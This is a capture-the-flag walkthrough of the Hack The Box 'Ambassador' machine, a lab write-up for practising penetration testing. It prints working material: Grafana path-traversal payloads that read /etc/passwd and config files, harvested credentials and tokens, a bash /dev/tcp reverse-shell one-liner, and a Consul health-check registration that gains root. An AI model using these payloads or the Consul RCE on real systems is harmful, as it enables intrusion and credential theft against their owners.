Ambassador Writeup
enumeration
It is recommended to run a rustscan
scan as it is a fast and reliable tool for performing network reconnaissance
. It’s a good practice to use this tool in order to gather information about the target’s open ports and services.
I always like to run a scan with the -g
option to concatenate open ports with a comma like this:
1
2
3
┌─[makider@makider-virtualbox]─[~/htb/broscience]
└──╼ $rustscan -a 10.129.218.98 -g
10.129.218.98 -> [22,80,3000,3306]
I can then utilize this information by incorporating the identified ports into nmap command for further enumeration.
Here is a template of the command i use for the enumeration process:
1
sudo nmap -sVCS -oN nmap/initial $IP -p $PORTS
This command utilizes the -sVCS option
, which allows for a more comprehensive scan of the target’s open ports. Let’s break this down:
-sV
option to enable version detection-sC
option to enable default scripts (same as –script default)-sS
option to enable SYN Stealth Scan that only forges a SYN packet to purposefully not complete the TCP handshake (logging evasion)
the -oN
option is useful to log the output of nmap to a file (in this case to the initial
file in the nmap
directory)
Here is the output of this command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
Nmap scan report for 10.129.218.98
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Wed, 05 Oct 2022 16:42:41 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Wed, 05 Oct 2022 16:42:10 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Wed, 05 Oct 2022 16:42:15 GMT
|_ Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 13
| Capabilities flags: 65535
| Some Capabilities: DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, ODBCClient, SupportsLoadDataLocal, Support41Auth, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolOld, FoundRows, LongColumnFlag, LongPassword, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, Speaks41ProtocolNew, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 6!C&~\x17S%\#\x13\x02()uB_ j\x0D
|_ Auth Plugin Name: caching_sha2_password
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
Okay, port 22,80,3000
and 3306
are open
- port
22
is a simpleSSH
server - port 80 is a
Apache
server it should contain a website, and thanks to the-sC
option for nmap we have managed to retrieve the http-title and generator:
1
2
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
so we know that this server was made by using Hugo generator version 0.94.2 and is a Developement Server, intresting…
- port 3000 as we will verify later is a
grafana
server
1
Grafana allows you to query, visualize, alert on, and understand your metrics no matter where they are stored. Create, explore, and share beautiful dashboards with your team and foster a data-driven culture.
- port 3306 is a mysql server
First of all i started by enumerating the “low hanging fruit” mysql by checking on internet for known exploits regarding this version (MySQL 8.0.30-0ubuntu0.20.04.2
) but nothing came up.
So i tried bruteforcing the login with the default user (mysql
) and with the metasploit auxiliary/scanner/mysql/mysql_login
module, but nothing, we need more information, maybe we need a user?
Next one in the list is port 80
that actually catched my eye’s attention due to the intresting name it had.
let’s see…
okay it seems to be a developement server but nothing stands out.
Based on this, i decided to run a nikto
scan to further enumerate the webpage for potential vulnerabilities.
Nikto
is an open-source web server scanner that is used to identify potential vulnerabilities in web servers. It can be used to detect a wide range of vulnerabilities including outdated software versions, misconfigurations, and potentially dangerous files or programs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nikto -h 10.129.218.98
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.129.218.98
+ Target Hostname: 10.129.218.98
+ Target Port: 80
+ Start Time: 2022-10-05 18:50:24 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xe46 0x5e7a7c4652f79
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ 6544 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-10-05 18:55:56 (GMT2) (332 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
intresting we found the sitemap.xml
file, for those who don’t know what it is, it’s basically a xml file that lists out all the files exposed on the webpage.
it’s very important since it can prevent you from using other enumeration tools like feroxbuster
or gobuster
to bruteforce directories.
Here is sitemap.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<urlset>
<url>
<loc>https://example.org/</loc>
<lastmod>2022-03-10T19:01:57+00:00</lastmod>
</url>
<url>
<loc>https://example.org/posts/</loc>
<lastmod>2022-03-10T19:01:57+00:00</lastmod>
</url>
<url>
<loc>
https://example.org/posts/welcome-to-the-ambassador-development-server/
</loc>
<lastmod>2022-03-10T19:01:57+00:00</lastmod>
</url>
<url>
<loc>https://example.org/categories/</loc>
</url>
<url>
<loc>https://example.org/tags/</loc>
</url>
</urlset>
With the information gathered from the this file we can now proceed to search for vulnerabilities and potentially interesting files on the target page.
After some time, i noticed this intresting welcome post:
1
2
3
4
5
6
7
8
**Welcome to the Ambassador Development Server**
March 10, 2022
Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
**Connecting to this machine**
Use the `developer` account to SSH, DevOps will give you the password.
This welcome post provides valuable information about the purpose and setup of the development server. I also attempted to connect to the server using the developer account by using common passwords, but without success.
So i decided to move on to the next port: 3000
.
LFI in grafana panel
As you probably know, we have enumerated this port before and it turned out to be a grafana
server let’s dig deeper.
The first thing to do is get the version of it:
grafana v8.2.0 (d7f71e9eae)
now, let’s search for known exploits on the internet.
Bingo!
https://www.exploit-db.com/exploits/50581
when you see the exploit-db website popping up as first result is always a big yahoooo!
At first, i tried using the allegated python script, but since it didn’t work i tried to do it manually with burpsuite, and after a little bit of debugging it worked!
/public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd
And there it is! We were able to successfully retrieve the /etc/passwd
file. This file contains a list of all the users on the system and is an important source of information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/false
okay from here we can see the users that can access bash: the developer
user and root
and intrestingly there is a consul service account that has a home
consul:x:997:997::/home/consul:/bin/false
we will come back on that later… for now let’s concentrate in this lfi.
The first thing I tried after dumping users is getting the database of grafana contained in the
/var/lib/grafana/grafana.db
folder.
I actually found some hashes that didn’t crack sadly
dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069
So why not try to get the configuration file for grafana? Let’s see…
By simply searching on interet for the file location (/public/plugins/table/../../../../../../../../../../../../../../etc/grafana/grafana.ini
) we can access the configuration file and potentially find the password.
And there it is!
1
2
3
4
5
6
7
8
9
10
11
#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false
# default admin user, created on startup
admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
i used these credentials to access the panel and it worked!
grafana panel and mysql access
at first glance, i tought i had to exfiltrate some files trough the grafana panel due to a path leak of some csv files but after some time i came to the conclusion that i must be missing something.
grafana, has a local database saved in /var/lib/grafana/grafana.db
, which contains users and hashed passwords. I didn’t write it in my notes, but i’m pretty sure i tried to crack them without success.
After a bit, the following information was found in the data_source table:
1
2
3
Username: grafana
Database: grafana
Password: dontStandSoCloseToMe63221!
By using this credentials with the mysql database open at port 3306, we are able to login, also tried ssh password reuse, but without success.
here’s a list of the database i found by executing the command show databases;
in the mysql shell
1
2
3
4
5
6
7
8
9
10
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+
Here we find an intresting database called whackywidget
in which we find a base64 encoded password that we will later use for ssh.
1
2
3
4
5
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
We can now login to ssh with:
developer:anEnglishManInNewYork027468
SSH as developer
as always, i’ll start my enumeration by doing some basic checks, and running linpeas.
here’s some intresting things i found:
1
2
3
4
5
6
7
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 4 root root 4096 Sep 1 22:13 .
drwxr-xr-x 20 root root 4096 Sep 15 17:24 ..
drwxr-xr-x 4 consul consul 4096 Mar 13 2022 consul
drwxrwxr-x 5 root root 4096 Mar 13 2022 my-app
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8300 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8301 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8302 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8500 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8600 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN -
by simply looking at the files in /opt folder, we can see that the server is running hashicorp consul (on port 8500
).
HashiCorp Consul is a service networking solution that enables teams to manage secure network connectivity between services and across on-prem and multi-cloud environments and runtimes.
At first i wasn’t sure that this could be a privesc vector, but after a quick process check (ps aux | grep consul
) i had no doubt left.
1
2
developer@ambassador:/opt/my-app$ ps aux | grep consul
root 1084 0.3 3.9 795572 78628 ? Ssl Oct07 2:26 /usr/bin/consul agent -config-dir=/etc/consul.d/config.d -config-file=/etc/consul.d/consul.hcl
consul was running as root!
Addtionally, in the developer’s home i found this intresting script that indeed specified they ran consul:
1
2
3
4
5
developer@ambassador:/opt/my-app/whackywidget$ cat put-config-in-consul.sh
# We use Consul for application config in production, this script will help set the correct values for the app
# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
This meant that they were probably using a CONSUL_HTTP_TOKEN as a “password”.
I also found a .gitconfig file containing the path to an application we saw earlier. /opt/my-app that contains a .git directory, let’s enumerate it!
1
2
3
4
5
[user]
name = Developer
email = developer@ambassador.local
[safe]
directory = /opt/my-app
always check the logs of a git directory, it could leak some intresting informations!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
developer@ambassador:/opt/my-app$ git show c982db8eff6f10f8f3a7d802f79f2705e7a21b55
commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:44:45 2022 +0000
config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
new file mode 100755
index 0000000..35c08f6
--- /dev/null
+++ b/whackywidget/put-config-in-consul.sh
@@ -0,0 +1,4 @@
+# We use Consul for application config in production, this script will help set the correct values for the app
+# Export MYSQL_PASSWORD before running
+
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
And there it is! The consul access token! bb03b43b-1d81-d62b-24b5-39540ee469b5
With this, i was able to actually able to authenticate with a tool called consul
(who would have guessed…) by exporting the token as a environment variable:
export CONSUL_HTTP_TOKEN=bb03b43b-1d81-d62b-24b5-39540ee469b5
we can now list tokens!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└──╼ $consul acl token list
AccessorID: 00000000-0000-0000-0000-000000000002
Description: Anonymous Token
Local: false
Create Time: 2022-03-13 23:14:16.941144142 +0000 UTC
Legacy: false
AccessorID: 2aae5590-4b99-3b3d-56d9-71b61ee9e744
Description: Bootstrap Token (Global Management)
Local: false
Create Time: 2022-03-13 23:14:25.977142971 +0000 UTC
Legacy: false
Policies:
00000000-0000-0000-0000-000000000001 - global-management
Now, we can try to get rce by registering a health check on consul.
I was able to do it after a bit of googling that lead to these links here
https://www.consul.io/docs/discovery/checks
https://www.consul.io/commands/services/register
Where, by copying an example from the last one i was able to get code execution and privescalate to root :)
rev.json:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
"name": "rvsh",
"tags": [
"default"
],
"checks": [
{
"name": "args_check",
"args": [
"/tmp/.nightmare/rev.sh"
],
"interval": "10s",
"timeout": "100s"
}
]
}
/tmp/.nightmare/rev.sh
1
/bin/bash -i >& /dev/tcp/ip/1234 0>&1
$ curl --request PUT --data @rev.json http://127.0.0.1:8500/v1/agent/service/register
and after 10 seconds i got a shell back to my netcat listener!! (nc -lnvp 1234
).
Done!
1
2
3
root@ambassador:/root# id
uid=0(root) gid=0(root) gruppi=0(root)
epilogue
I hope this information is helpful. I found this challenge from htb VERY interesting and really enjoyed working on it. It is truly deserving of its 4.5-star rating.
Also for the privilege escalation, a script made by gatogamer1155 has come out, here’s the link if you want to check it out! https://github.com/GatoGamer1155/Hashicorp-Consul-RCE-via-API
A big thank you to DirectRoot for creating such an engaging and rewarding experience :)